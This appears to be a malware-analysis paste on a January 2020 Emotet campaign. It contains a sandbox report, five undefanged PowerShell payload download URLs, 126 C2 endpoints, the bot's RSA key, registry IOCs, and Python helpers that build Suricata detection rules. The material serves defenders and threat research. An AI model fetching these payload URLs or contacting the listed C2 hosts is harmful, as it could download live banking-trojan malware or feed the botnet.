spamreports
emotet suncityefficiencytour.it/OLD-HACKED/ ☣
Jan 6th, 2020

REM See https://imgur.com/yxuUH09
REM EMOTET DOWNLOADED FROM https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct
REM ONLINE SINCE 18 DECEMBER
REM DISCOVERED BY @Cryptolaemus1
REM TRIAGE https://tria.ge/reports/200106-x2rer1qf2s/task1

Triage report summary (task 1)

Target: https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
Analysis profile: windows10_x64 (resource win10v191014, backend horse2)
Score: 10/10
Submitted: 2020-01-06T07:58:52Z
Reported: 2020-01-06T08:01:59Z
Completed: 2020-01-06 10:01
Max time kernel: 143s
Tags: trojan, banker, family:emotet
TTP: T1112, T1012, T1082
Counts: 16 signatures, 3 TTPs, 9 processes
Filesize / MD5 / SHA1 / SHA256: N/A (the task was submitted as a URL, not a file)
Extracted malware config (family: emotet; tags: trojan, banker)

PowerShell dropper stage (language ps1, type exe.dropper). The five payload URLs below are the ones Powershell.exe contacts, in this order, in the network log further down:
http://wingsingreen.com/wp-admin/ujs427/
http://nakhlmarket.com/bhbl/718727/
https://josesmexicanfoodinc.com/inquire/o415773/
http://stonearyan.com/flashchat/0cnsb31/
https://mustakhalf.com/a5lgi/h58a6u0435/

Emotet RSA public key (rsa_pubkey.plain):
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOmlscqbEIhLjVsj9r3eYacKi6C+Qrua
j5TlU+pn3zc0k06qCoahFXBBGnYMotHQc6OwfBKwHWm831LIVg29kEjT8UYxnN5v
fzNGgqXTe25QARf78CsQqqN/ImKdXo+GFwIDAQAB
-----END PUBLIC KEY-----
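A quick way to sanity-check the key the sandbox pulled out of the sample. This is an added example, not part of the paste or the Triage report; it uses only the standard library, walking the DER SubjectPublicKeyInfo layout by hand (SEQUENCE { SEQUENCE { OID rsaEncryption, NULL }, BIT STRING { SEQUENCE { INTEGER n, INTEGER e } } }) so it works where the `cryptography` package is not installed. The key constant is copied from the report's `rsa_pubkey.plain` field; everything else is the example's own code.

```python
"""Inspect the RSA public key from an extracted Emotet config (added example)."""
import base64
import hashlib
import re

# Copied from the report's rsa_pubkey.plain field.
EMOTET_PEM = """-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOmlscqbEIhLjVsj9r3eYacKi6C+Qrua
j5TlU+pn3zc0k06qCoahFXBBGnYMotHQc6OwfBKwHWm831LIVg29kEjT8UYxnN5v
fzNGgqXTe25QARf78CsQqqN/ImKdXo+GFwIDAQAB
-----END PUBLIC KEY-----"""

RSA_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1 rsaEncryption


def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the DER element starting at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def pem_to_der(pem):
    body = re.sub(r"-----(BEGIN|END) PUBLIC KEY-----", "", pem)
    return base64.b64decode("".join(body.split()))


def parse_rsa_spki(der):
    """Parse a SubjectPublicKeyInfo; return modulus size, exponent and a key ID."""
    tag, spki, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected outer SEQUENCE")
    tag, alg, pos = _read_tlv(spki, 0)
    if tag != 0x30:
        raise ValueError("expected AlgorithmIdentifier SEQUENCE")
    oid_tag, oid, _ = _read_tlv(alg, 0)
    if oid_tag != 0x06 or oid != RSA_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bitstr, _ = _read_tlv(spki, pos)
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("expected BIT STRING with 0 unused bits")
    _, rsapub, _ = _read_tlv(bitstr, 1)  # skip the unused-bits octet
    tag_n, n_bytes, pos = _read_tlv(rsapub, 0)
    tag_e, e_bytes, _ = _read_tlv(rsapub, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("expected INTEGER n, INTEGER e")
    n = int.from_bytes(n_bytes, "big")
    e = int.from_bytes(e_bytes, "big")
    return {
        "modulus_bits": n.bit_length(),
        "exponent": e,
        "sha256": hashlib.sha256(der).hexdigest(),  # stable ID to pivot on across samples
    }


def describe_emotet_key(pem=EMOTET_PEM):
    return parse_rsa_spki(pem_to_der(pem))


if __name__ == "__main__":
    info = describe_emotet_key()
    print(f"RSA-{info['modulus_bits']} e={info['exponent']} sha256={info['sha256']}")
```

The key in this config is a 768-bit RSA key with e=65537. Its SHA-256 over the DER encoding is a convenient pivot: the same public key shows up across many samples of the same botnet epoch, so hashing it lets you cluster configs without depending on the C2 list, which rotates far more often.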
C2 (126 endpoints, IP:port):
68.187.160.28:443
97.120.32.227:80
187.188.166.192:8080
144.217.117.207:8080
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
68.174.15.223:80
63.246.252.234:80
93.148.252.90:80
74.59.187.94:80
185.160.212.3:80
46.28.111.142:7080
183.99.239.141:80
68.129.203.162:443
144.139.56.105:80
191.183.21.190:80
81.157.234.90:8080
138.68.106.4:7080
203.130.0.69:80
181.36.42.205:443
190.97.30.167:990
94.200.114.162:80
149.62.173.247:8080
188.216.24.204:80
85.152.208.146:80
116.48.138.115:80
50.28.51.143:8080
190.210.184.138:995
83.165.78.227:80
68.183.170.114:8080
186.15.83.52:8080
93.67.154.252:443
74.79.103.55:80
152.170.108.99:443
111.125.71.22:8080
68.183.190.199:8080
93.144.226.57:80
82.8.232.51:80
37.187.6.63:8080
200.58.83.179:80
217.199.160.224:8080
86.42.166.147:80
91.74.175.46:80
97.81.12.153:80
125.99.61.162:7080
207.154.204.40:8080
14.160.93.230:80
87.106.77.40:7080
109.169.86.13:8080
91.205.215.57:7080
82.196.15.205:8080
96.61.113.203:80
181.198.203.45:443
130.204.247.253:80
5.88.27.67:8080
82.36.103.14:80
2.45.112.134:80
190.6.193.152:8080
63.248.198.8:80
51.255.165.160:8080
189.19.81.181:443
186.68.48.204:443
2.44.167.52:80
163.172.40.218:7080
201.213.32.59:80
151.237.36.220:80
77.55.211.77:8080
37.183.121.32:80
112.218.134.227:80
77.27.221.24:443
190.186.164.23:80
175.114.178.83:443
45.50.177.164:80
87.106.46.107:8080
91.204.163.19:8090
188.135.15.49:80
190.195.129.227:8090
159.203.204.126:8080
104.131.58.132:8080
185.86.148.222:8080
46.101.212.195:8080
223.255.148.134:80
79.7.114.1:80
80.11.158.65:8080
190.100.153.162:443
203.25.159.3:8080
2.139.158.136:443
72.29.55.174:80
73.60.8.210:80
37.211.49.127:80
212.71.237.140:8080
5.196.35.138:7080
185.160.229.26:80
91.83.93.124:7080
69.163.33.84:8080
45.8.136.201:80
83.248.141.198:80
200.119.11.118:443
219.75.66.103:80
118.36.70.245:80
192.241.146.84:8080
45.79.95.107:443
116.48.148.32:80
62.75.160.178:8080
142.127.57.63:8080
62.75.143.100:7080
119.59.124.163:8080
181.61.143.177:80
200.124.225.32:80
5.32.41.106:80
37.120.185.153:443
96.38.234.10:80
110.170.65.146:80
190.146.131.105:8080
2.42.173.240:80
191.103.76.34:443
91.117.83.59:80
58.171.38.26:80
178.79.163.131:8080
113.61.76.239:80
99.252.27.6:80
139.162.118.88:8080
165.228.195.93:80
212.237.50.61:8080
142.93.114.137:8080
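The C2 list above is only useful once it is deduplicated, validated and turned into something a sensor can load. The following is an added example (not part of the paste or the Triage report) that parses the report's own "value, blank line, value" export layout, drops anything that is not a routable IPv4:port pair, and emits one Suricata rule per endpoint. The sample text is a handful of entries copied from the list above in that layout; SID_BASE and the rule wording are the example's own assumptions.

```python
"""Deduplicate the report's C2 list and emit a blocklist plus Suricata rules (added example)."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a few entries copied from the report, in the export's
# duplicated layout, bracketed by the neighbouring section headers.
SAMPLE_C2_DUMP = """C2
68.187.160.28:443

68.187.160.28:443
97.120.32.227:80

97.120.32.227:80
187.188.166.192:8080

187.188.166.192:8080
190.97.30.167:990

190.97.30.167:990
91.204.163.19:8090

91.204.163.19:8090
Defense Evasion
"""

C2_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\s*$")
SID_BASE = 9_000_000  # assumption: a private SID range reserved for local rules


def parse_c2_list(text):
    """Extract unique, valid, globally routable (ip, port) pairs in first-seen order."""
    seen = {}
    for line in text.splitlines():
        m = C2_RE.match(line)
        if not m:
            continue
        ip, port = m.group(1), int(m.group(2))
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # malformed octet such as 300.1.1.1
        if not (1 <= port <= 65535) or not addr.is_global:
            continue  # drops loopback/RFC1918 noise such as 127.0.0.1:47001
        seen.setdefault((ip, port), None)
    return list(seen)


def group_by_port(c2s):
    """Port histogram; Emotet's mix of 80/443/7080/8080/8090/990/995 is visible here."""
    ports = defaultdict(list)
    for ip, port in c2s:
        ports[port].append(ip)
    return dict(ports)


def defang(ip, port):
    return f"{ip.replace('.', '[.]')}:{port}"


def suricata_rules(c2s, sid_base=SID_BASE, family="Emotet"):
    """One alert per exact ip:port pair, which keeps false positives on shared hosting low."""
    rules = []
    for i, (ip, port) in enumerate(c2s):
        rules.append(
            f'alert tcp $HOME_NET any -> {ip} {port} '
            f'(msg:"{family} C2 {ip}:{port}"; flow:to_server; '
            f'classtype:trojan-activity; sid:{sid_base + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    c2s = parse_c2_list(SAMPLE_C2_DUMP)
    for port, ips in sorted(group_by_port(c2s).items()):
        print(f"port {port}: {len(ips)} host(s)")
    for ip, port in c2s:
        print(defang(ip, port))
    print("\n".join(suricata_rules(c2s)))
```

Feed the full C2 section of the report into `parse_c2_list` and you get 126 pairs. Matching on the exact ip:port rather than the bare IP matters for this list: many of the entries are compromised residential or shared hosts, and alerting on any traffic to the address would page you on unrelated web browsing.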
TTP categories: Defense Evasion, Discovery

Signatures

Process spawned unexpected child process
  Processes: WINWORD.EXE, Powershell.exe
  Reported IOC (WINWORD.EXE): Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process
  Reported IOC (Powershell.exe): Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  (The macro launches PowerShell through WMI, so the PowerShell parent is wmiprvse.exe rather than WINWORD.EXE; detection rules keyed only on Office-as-parent miss this chain.)

Emotet

Executes dropped EXE
  Processes: 25.exe, 25.exe, acquiretexas.exe, acquiretexas.exe

Drops file in System32 directory
  Processes: 25.exe, acquiretexas.exe
  Reported IOC (25.exe):
    C:\Users\Admin\25.exe => C:\Windows\SysWOW64\acquiretexas.exe   File renamed
  Reported IOC (acquiretexas.exe):
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat   File opened for modification
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5   File opened for modification
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE   File opened for modification
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies   File opened for modification
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5   File opened for modification

Suspicious use of SetWindowsHookEx
  Processes: iexplore.exe, IEXPLORE.EXE, WINWORD.EXE, WINWORD.EXE, 25.exe, 25.exe, acquiretexas.exe, acquiretexas.exe

Checks processor information in registry
  Matched TTPs: Query Registry, System Information Discovery
  Reported IOC (process not attributed in the export):
    \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0   Key opened
    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz   Key value queried

Enumerates system info in registry
  Matched TTPs: Query Registry, System Information Discovery
  Reported IOC (process not attributed in the export):
    \REGISTRY\MACHINE\Hardware\Description\System\BIOS   Key opened
    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily   Key value queried
    \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU   Key value queried

Suspicious use of FindShellTrayWindow
  Processes: iexplore.exe

Suspicious behavior: AddClipboardFormatListener
  Processes: WINWORD.EXE, WINWORD.EXE

Modifies registry class
  (These are Explorer shell-bag/BagMRU view settings and the Office AppContainer (OICE) mapping created and torn down when Word opened the downloaded document; they are side effects of the sandbox run, not persistence.)
  Reported IOC (process not attributed in the export):
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000fdddd5f8bc85d501123bfafabc85d50106eeebfabc85d50114000000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\STORAGE\OICE_16_974FA576_32C1D314_18E5\CHILDREN   Key deleted
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_18e5   Key deleted
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\Moniker = "oice_16_974fa576_32c1d314_18e5"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599   Key deleted
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\MAPPINGS\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\CHILDREN   Key deleted
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\DisplayName = "OICE_16_974FA576_32C1D314_18E5"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"   Set value (int)
NTFS ADS
  Processes: WINWORD.EXE
  Reported IOC (WINWORD.EXE):
    C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_18e5\AC\Temp\9EFEC9F0.doc:Zone.Identifier   File opened for modification
  (The Zone.Identifier stream is the mark-of-the-web on the downloaded document; Word touches it when deciding whether to open the file in Protected View.)

Suspicious behavior: EmotetMutantsSpam
  Processes: 25.exe, acquiretexas.exe

Modifies Internet Explorer settings
  Matched TTPs: Modify Registry
  (These writes come from iexplore.exe being launched against the target URL by the sandbox itself; note TypedURLs\url1, which records the submitted URL.)
  Reported IOC (process not attributed in the export):
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c36c9cdac63c12448d84f1a7215689fa0000000002000000000010660000000100002000000012fa5f18d6865b700e027c6fb28203d32ffe030aa5f012bdf468f23ec71e5926000000000e80000000020000200000000b50af3b8eefc5ab870190c0bf2e78599d3ad018f30ce496a9651433821817e82000000044ef929d7727f7f528df008ae06912ff51e03023c24fa434d355e5498fac5ba640000000378bfa167c3f831822c437c4ba86f4b965b49dc29494a63b1d09d137270fb00f37667b3cfdf0166ebf6207954233df4b4420bb2a69e0499bb6fce9cf064d2d1f   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30786671"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "285066144"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D748E002-3062-11EA-BD7F-FAC4F462FE6F} = "0"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLs\url2 = "http://go.microsoft.com/fwlink/p/?LinkId=255141"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2887302262"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30786671"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url1 = 5d2542a46fc4d501   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url2 = 0000000000000000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f04f6fa46fc4d501   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2887302262"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2917146139"   Set value (int)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLs\url1 = "https://suncityefficiencytour.it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/"   Set value (str)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 4c6bfe76f785d501   Set value (data)
    \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"   Set value (int)
